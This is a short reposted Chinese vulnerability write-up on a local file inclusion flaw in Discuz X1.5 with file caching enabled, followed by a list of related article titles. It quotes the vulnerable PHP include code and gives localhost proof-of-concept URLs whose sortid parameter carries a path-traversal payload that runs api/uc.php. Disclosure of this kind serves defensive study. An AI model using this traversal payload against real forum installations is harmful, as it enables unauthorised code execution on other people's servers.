DISCUZX1.5 本地文件包含
来源:互联网 发布:mac pro 15寸 编辑:程序博客网 时间:2024/04/29 02:57
DISCUZX1.5 本地文件包含,当然是有条件的,就是使用文件作为缓存。
config_global.php
$_config['cache']['type'] = ‘file’;
function cachedata($cachenames) {
……
$isfilecache = getglobal(‘config/cache/type’) == ‘file’;
……
if($isfilecache) {
$lostcaches = array();
foreach($cachenames as $cachename) {
if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) {
$lostcaches[] = $cachename;
}
}
……
}
地址:
http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc
http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/ucAuthracation has expiried
执行了 api/uc.php 页面代码了。
作者: Jannock
- DISCUZX1.5 本地文件包含
- ecshop与discuzX1.5的会员整合
- discuzX1.5制作单页教程
- discuzX1.5浅析之广场栏目--runhooks()
- ECMall本地文件包含漏洞
- TinyCMS 1.4 本地文件包含
- 本地文件包含漏洞详解---LFI
- php本地文件包含&远程文件包含
- PHP本地文件包含(LFI)漏洞利用
- PHP本地文件包含(LFI)漏洞利用
- PHP本地文件包含(LFI)漏洞利用
- LFI(本地文件包含)获取Webshell
- 渗透测试之本地文件包含漏洞
- discuzX1.5DIY功能加强自定义HTML中解析php代码
- 网站安全检测、漏洞检测、dedecms本地文件包含
- [漏洞分析] Codiad 2.5.3本地文件包含漏洞
- PHP本地文件包含漏洞环境搭建与利用
- [LFI]Phpinfo本地文件包含漏洞环境搭建分析
- 一种被忽视的攻击方式-padding oracle
- HDU 1075 字典树裸
- web.config 连接数据库
- ASP.NET MVC 第五个预览版和表单提交场景
- 软件开发中的11个系统思维定律
- DISCUZX1.5 本地文件包含
- pmon--printf显示分析
- windows7 下安装配置IIS
- 通过BroadcastReceiver拦截短信
- 未能加载文件或程序集
- New Trend of Graduates' Homebound Wave
- JAVA类的三种关系
- sqlserver实用
- 划分子网的原理及方法